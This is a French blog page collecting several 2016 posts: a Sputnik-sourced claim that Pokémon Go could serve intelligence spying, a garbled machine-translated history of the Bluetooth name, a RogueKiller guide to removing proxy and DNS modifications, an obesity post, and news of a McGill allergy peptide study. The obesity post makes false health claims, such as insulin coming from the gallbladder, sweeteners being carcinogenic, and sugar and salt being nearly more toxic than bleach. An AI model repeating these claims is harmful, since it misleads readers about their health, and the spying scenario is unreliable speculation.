Voilà ce que vous acceptez en effet en installant l’appli.
« Si nous étions rachetés par un tiers à la suite d’une transaction telle qu’une fusion, une acquisition ou une vente d’entreprise, ou si nos actifs étaient rachetés par un tiers pour cause de faillite ou de cessation de commerce, une partie ou la totalité de nos actifs, y compris vos données à caractère personnel (ou celles de votre enfant autorisé), pourraient être divulguées ou transférées à un tiers acquéreur dans le cadre de la transaction », poursuivent les règles.
Imaginez-vous cela: le renseignement veut savoir ce qui se passe actuellement, par exemple… au Palais de l’Elysée. Et une minute plus tard les députés, les journalistes, les employés qui s’y trouvent sont tous rivés sur leurs portables qui leur signalent qu’un certain nombre de Pokémon sont dans la place…
Vous connaissez la suite.


Source.: Sputniknews

Pourquoi Bluetooth est appelé Bluetooth?


Bluetooth est nommé après le 10ème siècle d'un Roi scandinave ,il faut connaître l'histoire derrière ça.
L'introduction de la technologie Bluetooth est venu comme une révolution, qui a non seulement amélioré l'utilité des téléphones mobiles, mais également le partage de fichiers un jeu d'enfant. Il a donné un nouveau sens au monde de la communication sans fil. Mais avez-vous déjà réfléchi à la façon dont Bluetooth a obtenu son nom en premier lieu? Avez-vous déjà demandé où les origines du terme «Bluetooth» viennent?
Cependant, il y a une histoire très intéressante derrière tout cela.
En 1996, un certain nombre de sociétés - Intel, Ericsson, Nokia, et plus tard IBM - étaient à la recherche de normaliser l'industrie autour d'une liaison radio à courte portée pour faire un certain nombre de choses. Chaque entreprise avait développé leurs propres technologies radio à courte portée, mais tous les noms ils sont venus avec . C'est alors un roi Scandanavian obscure venu du Moyen Age,les inspira.
Le roi Harald Gormsson est célèbre pour son pouvoir au Danemark et la Norvège entre environ 940 et environ 986. Le roi Harald était aussi célèbre pour l'achèvement des travaux de son père d'unifier les diverses tribus danoises en un seul royaume danois autour 970. Même si, il était seulement en mesure de maintenir cette unification pendant quelques années.
Comme beaucoup de dirigeants médiévaux, il avait aussi un surnom: Blatonn en vieux norrois (un membre de la famille des langues germaniques) ou Blatand en danois. Cela signifie que le Bluetooth. L'origine exacte du surnom est en débat, mais de nombreux chercheurs croient que le roi Harald a été appelé Bluetooth parce qu'il avait une dent morte remarquable qui exactement avait l'air noir et bleu. Il est logique.
Pourquoi est-Bluetooth appelé Bluetooth?
Alors, qu'est-ce qu'un tour-du-dernièr-millénaire du roi Viking ont à voir avec la communication sans fil? Il était un unificateur !
Au milieu des années 1990, le domaine de la communication sans fil avait besoin d'unification. De nombreuses sociétés se développaient normes concurrentes, non-compatibles. Plusieurs personnes ont vu cette division croissante comme une faiblesse à l'adoption généralisée du sans fil.
C'est alors ingénieur Intel Jim Kardach a pris le rôle d'un médiateur inter-entreprise consacrée à l'obtention de diverses entreprises ensemble pour élaborer une norme pour de faible puissance, la connectivité radio à courte portée dans toute l'industrie. Il a également été pris en charge par l'ingénieur Ericsson Sven Mattisson.
Tout en ayant une conversation sur l'histoire, Mattisson dit Kardach qu'il venait de lire un livre intitulé Les Longships par Frans G. Bengtsson qui a compilé les voyages de guerriers danois sous le règne du roi Harald "Bluetooth" Gormsson. Plus tard, Kardach lire Les Vikings par Gwyn Jones qui a comporté le règne de Harald, qu'il considéré comme un symbole idéal pour réunir les parties concurrentes ensemble, comme il l'a expliqué:
"Bluetooth a été emprunté au 10e siècle, le deuxième roi du Danemark, le roi Harald Bluetooth; qui était célèbre pour unir la Scandinavie tout comme nous avions l'intention d'unir le PC et les industries cellulaires avec une liaison sans fil à courte portée ".
"Harald avait uni le Danemark et christianisé les Danois!" A écrit Kardach dans une colonne d'une décennie plus tard. "Il est venu à moi que cela ferait un bon nom de code pour le programme."
Toutes les différentes parties intéressées enfin se sont réunis pour former le Bluetooth Special Interest Group, qui a développé le convenu standard que nous connaissons et aimons aujourd'hui. «Bluetooth» a été initialement conçu pour être juste un nom de code pour la technologie. Il a finalement fini par coller bien et est devenu le nom officiel de la norme.
Pourquoi est-Bluetooth appelé Bluetooth?







L'histoire millénaire  ne se termine pas là. Le logo Bluetooth découle également de "Harald Blatand", avec les longues branches nordiques pour runes "H" et "B" comprenant la conception que vous voyez dans l'ovale bleu du logo. Le logo Bluetooth désormais emblématique est en fait une combinaison-officiellement connu comme une liaison rune des initiales du Roi Bluetooth en runes scandinaves: ᚼ et ᛒ. Lorsque vous rejoignez les deux pour faire une rune de liaison et déposez-le sur un fond bleu, vous obtenez le logo Bluetooth .
Alors, voici comment, nous avons obtenu ce nom et le symbole! Intéressant, non?


Source.:

jeudi 11 août 2016

Retirer PUM (pour modification potentiellement indésirable):



Retirer PUM (Guide)Qu'est-ce qu'un PUM?A PUM (pour modification potentiellement indésirable)(for Potentially Unwanted Modification) est une modification sensible faite par un programme qui peut être un logiciel malveillant ou légitime, ou même fait par l'utilisateur. Une telle détection est déclenchée en fonction de ce qui est modifié.Plusieurs exemples:PUM.Proxy: Un proxy est un programme en cours d'exécution, soit localement (sur votre machine) ou sur une machine distante (serveur) qui agit comme un filtre web. Il est capable de lire, décoder et filtrer tout le trafic Internet et rebondir certaines demandes fondées sur des règles. Dans un contexte d'entreprise, les procurations sont utilisés pour protéger terminaux ou refuser certains sites Web au travail (Facebook, ...). À la maison, la plupart du temps ces procurations sont malveillants.utiliser un proxy Malware pour refuser l'accès pour aider les forums, ou télécharger des sites (ils ne veulent pas que vous soyez en mesure de désinfecter votre machine). Ils sont également utilisés pour récupérer des informations sur vos habitudes d'Internet, et injecter des annonces ou rediriger vers des sites Web malveillants. Ce que vous devez savoir est que fondamentalement un proxy peut lire et modifier l'ensemble du trafic Internet qui passe à travers elle.L'exemple suivant est fait avec un programme LEGIT, "Fiddler". Il démontre ce qu'un proxy peut faire (en cours d'exécution au niveau local).

 
RogueKiller détecte la PUM comme ceci: 

PUM.DNS: Un DNS est un serveur qui traduit les noms d'hôte (ex: google.com) en une adresse IP (ex: 216: 58.192.14). Habituellement, un bon point de configuration DNS à votre serveur DNS de votre FAI, ou à des serveurs tiers parti DNS comme OpenDNS ou Google DNS. Cependant, certains logiciels malveillants peuvent changer cette configuration (il est une clé de registre) pour pointer vers un serveur DNS malveillant, qui renverra les adresses IP erronées et vous forcer à aller sur les sites Web malveillants (ex: vous tapez google.com et DNS malveillant vous le retourne adresse d'un serveur qui ressemble à Google, mais sert les choses malveillantes).Dois-je retirer?Par défaut, PUM sont considérés comme entre-deux logiciels malveillants et en toute sécurité. RogueKiller ne peut pas décider par lui-même si elle est malveillant ou non, tout point qu'il existe. Il est fait de cette façon parce que parfois la modification est voulu et a été mis en place par lui-même utilisateur ou par l'administrateur de la machine (dans l'entreprise).Pour répondre à la question, il est à vous. Si vous êtes à la maison, vous voudrez probablement les supprimer.Cependant, vous devez savoir qu'il est sécuritaire d'enlever et ne cassera pas votre ordinateur, PUM ne sont pas critiques.SuppressionAnalysez votre ordinateur avec RogueKiller et supprimer les valeurs de PUM détectées.

Source.:

mardi 9 août 2016

Pourquoi sommes nous tous un peu obèse ?




75% des produits transformés vendus en épicerie contiennent du sucre.Et le sucre le plus économique pour les transformateurs ,c'est le sucre de mais. Le plus utilisé des sucres industriels est le sirop de maïs à haute teneur en fructose. Or, c’est justement le fructose qui fait le plus de dommage à l’organisme.Car il cré des protines sucrées, qui sont attaquées par le système immunitaire,rendant inefficace l'insuline de notre visicule biliaire.Donc cette inflammation va engendrer la création de plaque athéromateuse dans nos vaisseaux sanguins.
Et nous consommons 10 fois la quantité de sucre selon l'organisation mondiale pour la santé.

Les faux sucres: zéro calorie = zéro problème?
Le sucre c'est un produit toxique !

La surconsommation de sucre est néfaste pour la santé. Or, depuis des années, pour protéger leur santé, de nombreux consommateurs se sont tournés vers des produits sans sucre ajouté. Si ces produits sont moins caloriques, c’est parce qu’on leur a substitué du sucre par un édulcorant artificiel. Même goût sucré, mais sans les calories. Les édulcorants artificiels sont censés éviter la prise de poids. Ce n’est malheureusement pas le cas.
Zéro calorie n’égale pas zéro problème.
Les sodats diètes ne sont pas sans sucre, il y a des édulcorants qui sont nocifs et plus sucrés que le sucre de table.
Parce que les édulcorants imite le sucre et leurre notre organisme qui par la suite laissera entrer le sucre dans notre sang,car notre cerveau ne fait plus la différence entre le sucre et les édulcorants.Ils agissent par des effets pervers sur notre microbiote.
Les édulcorants sont aussi cancérigène a long terme.

Les gras: Les bons et les méchants

 À partir des années 1970, la volonté d’éliminer le gras s’impose. Bons ou mauvais, les gras ont mauvaise réputation. Pourtant il ne faut pas tous les mettre dans le même panier. Certains sont excellents, d’autres sont carrément à bannir. Pourquoi et comment ces gras affectent-ils nos artères et notre sang ?
Les huiles végétales naturelle ,avocat,poisson et noix ,voila des bons gras! Il faut éliminer les gras trans !
Les gras saturés sont mauvais si ont en mange trop , pas plus de 10% de nos calories.
 C'est les petites molécules des LDL qui formera les plaques athéromateuses dans nos vaisseaux sanguins.

L'énergie vient de vos mitochondries ?
Les mytochondries sont la centrale énergétique de votre corps et sont présente dans toute vos cellules.Il y a plus de 98% de mytochondries dans les cellules de vos muscles,alors plus vous ferez de l'exercise ,plus vous aurez des muscles et de l'énergie ! Le processus de perte de masse musculaire commence a 30 ans et augemente plus ou moins rapidement ,selon votre taux d'activité musculaire.Il se pourrait même qu'en perdant de la masse musculaire vous gagneriez de la masse adipeuse, en gras viscérale,et qui est le plus mortel pour votre santé.En somme vous aurez peut être le même poid ,mais avec plus de gras que de muscle !

La génétique: Sommes-nous tous égaux?

 Personne ne métabolise la nourriture de la même façon. Injustice ou génétique? Les gènes sont un facteur important à l’origine de ces nombreuses variations. Ils déterminent comment le corps réagit à un surplus calorique et comment il emmagasine les gras. Certains ont même la chance de ne rien accumuler !
La graisse viscérale est la plus dangereuse. La graisse brune ,pour ceux qui en ont,brûlera vos calories pendant toute votre vie.Mais surtout ,faut pas prendre notre bouche pour une poubelle.Nos bactéries de notre microbiote transforme 30 % de nos calories, en transformant les légumes,fruits et les céréales crus que nous consommons.Certaines formes d'obésité dites monogéniques, parfois extrêmes, sont liées à la présence d'une mutation unique sur un gène. Jusqu'à présent, huit gènes (lep, lepr, mc4r, pomc, pcsk1, bdnf, ntkr2, sim1) ont été identifiés, d'abord chez la souris, puis chez l'homme, comme responsables de telles formes d'obésité : les personnes ayant une mutation sur un de ces gènes ont une forte probabilité d'être obèses. Tous ces gènes conduisent à la synthèse de protéines clés d'une voie centrale dans la régulation de la prise alimentaire et du poids : la voie de la satiété déclenchée par la production d'une hormone, la leptine, dans le tissu graisseux (adipeux).

Les bactéries du colon:
Les microbes nous aident à digérer les aliments, à récolter des calories, à nous fournir de l'énergie, à produire des vitamines essentielles, à réguler l'appétit, à protéger notre système immunitaire et à repousser les méchants. Mais en raison de notre mode de vie moderne, y compris un régime alimentaire occidental hautement transformé et la surutilisation d'antibiotiques, certaines des espèces de bactéries qui vivaient autrefois dans notre intestin sont sur le point de disparaître.Nos microbes ont besoin de manger, mais nous les affamons en ne les nourrissant pas avec les aliments appropriés. La digestion est déja fini avant d'arriver au gros intestin,il nous faut des fibres!!! 
 Le résultat? Les entrailles malsaines, et un taux d'obésité qui a grimpé en flèche.Time Spector a travaillé longtemps la dessus.Selon le généticien Tim Spector, auteur du nouveau livre "Le mythe de la diète: la vraie science derrière ce que nous mangeons", le mythe le plus important est que, "comme les rats de laboratoire identiques", nous répondons tous à la nourriture et consommons les mêmes façon.Mais tout comme les empreintes digitales, le microbiome de chaque personne est unique, de même que la façon dont le régime alimentaire influe sur notre poids et notre santé. Ainsi, le régime qui fonctionne pour un scientifique britannique peut être radicalement différent d'un chasseur-cueilleur en Tanzanie, ou même de la personne vivant à côté.

La solution:
 Consommer des jus de fruits frais et manger des noix est la solution !
Il faut manger un régime méditéranéen et faire de l'exercise.

Produits toxiques:
Le sucre et le sel ,c'est presque plus toxique pour le corps que de l'eau de javel !



Source.:

jeudi 4 août 2016

Allergie : Un vaccin qui pourrait contrer les allergies respiratoires


Éduquer le système immunitaire, prévenir les allergies


Une équipe de recherche du CUSM développe un vaccin qui pourrait contrer les allergies respiratoires


Pour des millions de Canadiens, l’arrivée du printemps marque le rituel des éternuements et d’une respiration sifflante causés par leurs allergies saisonnières.
Une équipe de recherche à l'Hôpital de Montréal pour enfants de l'Institut de recherche du Centre universitaire de santé McGill (IR-CUSM) leur apporte une lueur d'espoir grâce à un vaccin qui serait capable de rediriger la réponse immunitaire et l’écarterait ainsi de la voie qui conduit au développement des allergies. Les résultats, publiés dans la revue Mucosal Immunology, ont des implications cliniques importantes car les allergies et l'asthme sont des conditions permanentes qui se déclarent souvent dès l’enfance et qui n’ont, pour l’instant, aucune cure.
« Pour la première fois, notre étude offre la possibilité de prévenir les allergies en utilisant une molécule qui éloigne la réponse immunitaire de la réponse allergique », explique l'auteure principale, Dre Christine McCusker, allergologue à l'Hôpital de Montréal pour enfants et professeure agrégée au Département de pédiatrie à l’Université McGill. « Cette découverte est très prometteuse puisque la molécule que nous avons développée peut être administrée sous forme de goutte dans le nez par pulvérisation ».
On estime que 20 à 30 pour cent de la population canadienne souffre de toute une gamme d'allergies. Les recherches récentes indiquent qu'un Canadien sur 13 souffre d'une allergie alimentaire importante. On ne sait toujours pas ce qui cause les allergies, mais nous croyons que tous les enfants naissent avec le potentiel de développer des allergies. Les enfants qui n’ont pas d’allergies passent à une réponse immunitaire non allergène lorsqu’ils sont confrontés aux allergènes. Chez ceux qui développent des allergies, ce changement n’est pas effectué au moment où ils sont confrontés à des allergènes.
La Dre McCusker et son équipe des Laboratoires Meakins-Christie ont eu recours à des modèles animaux pour tester une molécule précise – le peptide STAT6 – qui est importante dans le développement de la réaction allergique. Ils pensaient que s’ils pouvaient provoquer l’inhibition de cette molécule, cela réduirait les symptômes des maladies des voies respiratoires dues aux allergies, comme l'asthme, chez les animaux allergiques. Ils espéraient aussi empêcher l'allergie de se développer. Pour ce faire, ils ont développé un peptide inhibiteur, le STAT6-IP, et l’ont administré par voie intranasale à des souriceaux nouveau-nés au moyen de gouttelettes.Le STAT6-IP qui empêche les cellules dendritiques du système immunitaire de réagir fortement a un allergène inoffensif.
« En administrant le peptide STAT6-IP très tôt, avant même que les allergies soient présentes, nous avons pu éduquer le système immunitaire. Donc, quand nous avons ensuite essayé de rendre les souris allergiques, nous ne pouvions pas, parce que le système immunitaire avait “appris” à tolérer les allergènes, » explique Dre McCusker qui est également chercheuse à l’IR-CUSM.
« La beauté de notre approche, c’est que nous n’avons pas besoin de la jumeler à un allergène spécifique, nous n’utilisons que ce peptide. Celui-ci redirige tout simplement le système immunitaire ailleurs que vers la réponse allergique et cela n’aura plus d’importance si l'enfant est exposé au pollen, aux chats ou aux chiens, car le système immunitaire ne formera plus de réaction allergique agressive », ajoute Dre McCusker.
« Chez les sujets susceptibles de développer des allergies, ce système a pris la “mauvaise” décision en cours de route », explique Dre McCusker. « C’est comme si on éduquait le système immunitaire à suivre la bonne voie. »
Les chercheurs étudient actuellement l'effet de ce peptide de plusieurs façons pour voir dans quels autres domaines ce genre d'enseignement immunitaire pourrait prévenir les maladies, comme le domaine des allergies alimentaires. Ils espèrent ensuite passer aux essais cliniques chez l’humain.
Partenaires de recherche
L’étude « TGF-ß-Mediated Airway Tolerance to Allergens Induced by Peptide based Immunomodulatory Mucosal Vaccination » a été coécrite par H. Michael, Y. Li, Y. Wang, D. Xue, J. Shan, BD. Mazer et CT. McCusker des Laboratoires Meakins-Christie, de l'Université McGill et de l'Institut de recherche du Centre universitaire de santé McGill, Montréal, Québec, Canada.


Source.: